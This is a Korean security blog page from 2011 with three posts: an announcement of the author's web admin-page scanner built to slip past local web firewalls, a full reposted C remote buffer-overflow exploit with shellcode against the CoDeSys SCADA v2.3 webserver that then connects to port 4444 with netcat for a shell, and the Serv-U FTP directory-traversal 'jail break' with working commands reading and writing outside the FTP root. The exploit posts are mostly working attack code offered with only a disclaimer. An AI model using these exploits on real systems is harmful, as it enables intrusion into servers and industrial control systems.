작은여우와 암행어사

[자작툴] 웹 취약점 보안 점검툴 - VPS(Vulnerable Page Scanner) v0.7a

수술_도구/진찰도구(Scanner) 2011. 12. 14. 09:54

웹 어플리케이션 보안성 강화를 위해 VPS(Vulnerable Page Scanner)자작툴을 만들었습니다.

OWASP에서 요청되는 관리자 페이지 노출 취약점에 대해 점검하는 툴이며 영감은 Havij에서 받았습니다. 갈수록 수동점검 요청이 늘어나고 있으며 국내 웹방화벽에서 화이트 스캐너에 대해 내성(?)이 있으므로 약간 변형 하였습니다.

Havij 기능과 사용방법은 비슷하지만 차별화된 특징 있다면..

1) 302 리다이렉트에 대해 분별.

2) 방화벽으로 인한 200 응답에 대한 에러 페이지 구별.

3) 웹에디터 (Fckeditor, ezeditor...)기타 디폴트 에디터 페이지 찾기

4) Agent 변경 가능

5) 점검 속도 조절

6) 포트 점검

사용방법은 아래 사진과 같습니다.

1. 압축 파일 해제 후

2. 기본 설명

3. 기본 사용법

4. 다른 확장자 점검시

5. 결과값 확인

P.S: 파일 안정화 및 보안성을 위해 우선적으로 프로그램 만료일을 2011년 12월 30일로 막아놨습니다.

※ 도출된 페이지에 대해서는 지정된 IP 이외에는 접근 가능하지 못하도록 하거나 디렉터리명을 변경하는등 보안성 강화를 해야 합니다. (IP 접근 제한의 예는 해당 블로그에 기재되어 있음)

VPS_v0.7c.zip

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

저작자표시 비영리 변경금지

'수술_도구 > 진찰도구(Scanner)' 카테고리의 다른 글

XSS Vulnerability Scanner (0)	2011.09.09
[웹 스캐너] Samurai Web Testing Framework (0)	2011.08.31
XCode SQL Injection/LFI/XSS Vulnurable & Webshell Scanner (0)	2011.08.31
SolarWinds: Network Management Software & Network Monitoring ... (0)	2011.08.09
[웹진단 스캐너] Netsparker (2)	2011.08.08

Posted by bitfox

[Remote Exploits] CoDeSys SCADA v2.3 Remote Exploit

위험한_친구들/깍쟁이_서버양 2011. 12. 2. 08:48

/* 

CoDeSys v2.3 Industrial Control System Development Software 

Remote Buffer Overflow Exploit for CoDeSys Scada webserver 

Author : Celil UNUVER, SignalSEC Labs 

www.signalsec.com 

Tested on WinXP SP1 EN 

THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY! 

--snip-- 

root@bt:~# ./codesys 192.168.1.36 

CoDeSys v2.3 webserver Remote Exploit 

 by SignalSEC Labs - www.signalsec.com 

[+]Sending payload to SCADA system! 

[+]Connecting to port 4444 to get shell! 

192.168.1.36: inverse host lookup failed: Unknown server error : Connection timed out 

(UNKNOWN) [192.168.1.36] 4444 (?) open 

Microsoft Windows XP [Version 5.1.2600] 

(C) Copyright 1985-2001 Microsoft Corp. 

C:\Program Files\3S Software\CoDeSys V2.3\visu>   

--snip-- 

*/

#include <stdlib.h> 

#include <stdio.h> 

#include <string.h> 

#include <sys/types.h> 

#include <sys/socket.h> 

#include <netinet/in.h> 

#include <arpa/inet.h> 

#include <unistd.h> 

#define name "CoDeSys v2.3 webserver Remote Exploit" 

#define PORT 8080 

#define JUNK "A" 

int main ( int argc, char *argv[] ) 

{ 

int sock, i, payload; 

struct sockaddr_in dest_addr; 

char *target = "target"; 

char request[1600], *ptr; 

char ret[] = "\x67\x42\xa7\x71"; //ret - WINXP SP1 EN , mswsock.dll 

char hellcode[] = 

"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"

"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"

"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"

"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"

"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"

"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x48"

"\x4e\x36\x46\x52\x46\x42\x4b\x58\x45\x54\x4e\x43\x4b\x38\x4e\x37"

"\x45\x50\x4a\x47\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x4a\x31\x4b\x58"

"\x4f\x55\x42\x52\x41\x50\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x58"

"\x41\x50\x50\x4e\x41\x33\x42\x4c\x49\x59\x4e\x4a\x46\x38\x42\x4c"

"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e"

"\x46\x4f\x4b\x33\x46\x55\x46\x42\x4a\x32\x45\x47\x45\x4e\x4b\x58"

"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x48\x4e\x50\x4b\x34"

"\x4b\x48\x4f\x45\x4e\x31\x41\x50\x4b\x4e\x43\x30\x4e\x52\x4b\x38"

"\x49\x58\x4e\x36\x46\x42\x4e\x41\x41\x36\x43\x4c\x41\x43\x4b\x4d"

"\x46\x56\x4b\x48\x43\x44\x42\x53\x4b\x58\x42\x44\x4e\x30\x4b\x48"

"\x42\x47\x4e\x41\x4d\x4a\x4b\x48\x42\x34\x4a\x30\x50\x35\x4a\x56"

"\x50\x48\x50\x54\x50\x50\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x46"

"\x43\x55\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x36\x47\x37\x43\x57"

"\x44\x33\x4f\x35\x46\x55\x4f\x4f\x42\x4d\x4a\x36\x4b\x4c\x4d\x4e"

"\x4e\x4f\x4b\x53\x42\x55\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"

"\x48\x46\x41\x58\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x50"

"\x4f\x4f\x42\x4d\x4a\x56\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x55"

"\x4f\x4f\x48\x4d\x43\x45\x43\x35\x43\x45\x43\x55\x43\x45\x43\x34"

"\x43\x45\x43\x44\x43\x35\x4f\x4f\x42\x4d\x48\x56\x4a\x36\x41\x31"

"\x4e\x35\x48\x46\x43\x45\x49\x48\x41\x4e\x45\x59\x4a\x46\x46\x4a"

"\x4c\x41\x42\x37\x47\x4c\x47\x55\x4f\x4f\x48\x4d\x4c\x36\x42\x41"

"\x41\x45\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52"

"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x4f\x4f\x42\x4d"

"\x4a\x56\x45\x4e\x49\x44\x48\x38\x49\x54\x47\x55\x4f\x4f\x48\x4d"

"\x42\x55\x46\x45\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"

"\x47\x4e\x49\x57\x48\x4c\x49\x57\x47\x55\x4f\x4f\x48\x4d\x45\x55"

"\x4f\x4f\x42\x4d\x48\x56\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36"

"\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x45\x49\x45\x49\x32\x4e\x4c"

"\x49\x48\x47\x4e\x4c\x56\x46\x34\x49\x48\x44\x4e\x41\x33\x42\x4c"

"\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x32\x50\x4f\x44\x54\x4e\x52"

"\x43\x39\x4d\x58\x4c\x57\x4a\x43\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x46"

"\x44\x37\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x47\x46\x34\x4f\x4f"

"\x48\x4d\x4b\x35\x47\x45\x44\x35\x41\x35\x41\x35\x41\x45\x4c\x56"

"\x41\x30\x41\x35\x41\x35\x45\x55\x41\x45\x4f\x4f\x42\x4d\x4a\x56"

"\x4d\x4a\x49\x4d\x45\x50\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x46"

"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x48\x47\x55\x4e\x4f"

"\x43\x58\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d"

"\x4a\x56\x4f\x4e\x50\x4c\x42\x4e\x42\x56\x43\x45\x4f\x4f\x48\x4d"

"\x4f\x4f\x42\x4d\x5a"; 

printf ("\n%s\n by SignalSEC Labs - www.signalsec.com\n", name); 

if (argc < 2)  

{ 

        printf ("\nUsage: codesys [IP]\n"); 

        exit (-1); 

} 

setenv (target, argv[1], 1); 

memset (request, '\0', sizeof (request)); 

ptr = request; 

strcat (request, "GET /"); 

for(i = 1; i < 776; i++){ 

    strcat (request, JUNK); 

} 

strcat (request, ret); 

strcat (request, hellcode); 

strcat (request, " HTTP/1.1"); 

strcat (request, "\r\n"); 

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){ 

        perror("\nsocket error\n"); 

        exit (1); 

        } 

dest_addr.sin_family = AF_INET; 

dest_addr.sin_port = htons(PORT); 

if (! inet_aton(argv[1], &(dest_addr.sin_addr))) { 

        perror("inet_aton problems"); 

        exit (2); 

        } 

memset( &(dest_addr.sin_zero), '\0', 8); 

if (connect (sock, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){ 

        perror("\nCouldnt connect to target!\n"); 

        close (sock); 

        exit (3); 

        } 

payload = (send (sock, ptr, strlen(request), 0)); 

if (payload == -1) { 

        perror("\nCan not send the payload\n"); 

        close (sock); 

        exit(4); 

        } 

close (sock); 

printf ("\n[+]Sending payload to SCADA system!\n"); 

sleep (1); 

printf ("\n[+]Connecting to port 4444 to get shell!\n"); 

sleep (2); 

system("nc -vv ${target} 4444 || echo 'Sorry exploit failed! Change RET address or be sure target is not patched!'"); 

exit (0); 

}

[출처] exploit-db.com

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

저작자표시 비영리 변경금지

'위험한_친구들 > 깍쟁이_서버양' 카테고리의 다른 글

[Remote Exploits] Serv-U FTP Server Jail Break 0day (0)	2011.12.02
[Remote Exploits] FreeBSD ftpd and ProFTPd on FreeBSD Remote r00t Exploit (0)	2011.12.02
[Remote Exploits] IBM Lotus Domino Controller auth. bypass (0)	2011.12.01

Posted by bitfox

[Remote Exploits] Serv-U FTP Server Jail Break 0day

위험한_친구들/깍쟁이_서버양 2011. 12. 2. 08:43

I m better than TESO!
CONFIDENTIAL SOURCE MATERIALS!

[*]----------------------------------------------------[*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*]----------------------------------------------------[*]

Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...

[*]----------------------------------------------------[*]
C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp        (anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r--   1 user     group           0 Nov 12 21:48 .
dr--r--r--   1 user     group           0 Nov 12 21:48 ..
drw-rw-rw-   1 user     group           0 Feb 14 2011 Apache Software Foundatio
n
drw-rw-rw-   1 user     group           0 Feb 5 2011 ComPlus Applications
drw-rw-rw-   1 user     group           0 Jul 11 01:06 Common Files
drw-rw-rw-   1 user     group           0 Jul 8 16:57 CoreFTPServer
drw-rw-rw-   1 user     group           0 Jul 11 01:06 IIS Resources
d---------   1 user     group           0 Jul 8 16:12 InstallShield
Installation Information
drw-rw-rw-   1 user     group           0 Jul 29 15:07 Internet Explorer
drw-rw-rw-   1 user     group           0 Jul 8 16:12 Ipswitch
drw-rw-rw-   1 user     group           0 Feb 12 2011 Java
drw-rw-rw-   1 user     group           0 Jul 26 13:19 NetMeeting
drw-rw-rw-   1 user     group           0 Jul 29 14:39 Outlook Express
drw-rw-rw-   1 user     group           0 Jul 8 15:39 PostgreSQL
drw-rw-rw-   1 user     group           0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw-   1 user     group           0 Feb 12 2011 Sun
d---------   1 user     group           0 Jul 29 15:13 Uninstall Information
drw-rw-rw-   1 user     group           0 Feb 5 2011 VMware
drw-rw-rw-   1 user     group           0 Jul 8 15:34 WinRAR
drw-rw-rw-   1 user     group           0 Jul 26 13:30 Windows Media Player
drw-rw-rw-   1 user     group           0 Feb 5 2011 Windows NT
d---------   1 user     group           0 Feb 5 2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>
[*]----------------------------------------------------[*]
with write perms:
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
[*]----------------------------------------------------[*]
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
[*]----------------------------------------------------[*]

This works to!!! :

220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s

[*]----------------------------------------------------[*]
Sometimes you need to give it the path:

ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>

[출처] exploit-db.com

[주의] 본 자료는 연구용 및 학습 자료로 사용하길 바라며, 악의적인 사용시 사용자 본인에게 책임이 있음을 명시합니다.

저작자표시 비영리 변경금지

'위험한_친구들 > 깍쟁이_서버양' 카테고리의 다른 글

[Remote Exploits] CoDeSys SCADA v2.3 Remote Exploit (0)	2011.12.02
[Remote Exploits] FreeBSD ftpd and ProFTPd on FreeBSD Remote r00t Exploit (0)	2011.12.02
[Remote Exploits] IBM Lotus Domino Controller auth. bypass (0)	2011.12.01

Posted by bitfox

◀ 이전페이지 1 ··· 9 10 11 12 13 14 15 ··· 64 다음페이지 ▶

暗行御史

[자작툴] 웹 취약점 보안 점검툴 - VPS(Vulnerable Page Scanner) v0.7a

'수술_도구 > 진찰도구(Scanner)' 카테고리의 다른 글

[Remote Exploits] CoDeSys SCADA v2.3 Remote Exploit

'위험한_친구들 > 깍쟁이_서버양' 카테고리의 다른 글

[Remote Exploits] Serv-U FTP Server Jail Break 0day

'위험한_친구들 > 깍쟁이_서버양' 카테고리의 다른 글

최근에 올라온 글

공지사항

글 보관함

최근에 받은 트랙백

카테고리

달력

링크

티스토리툴바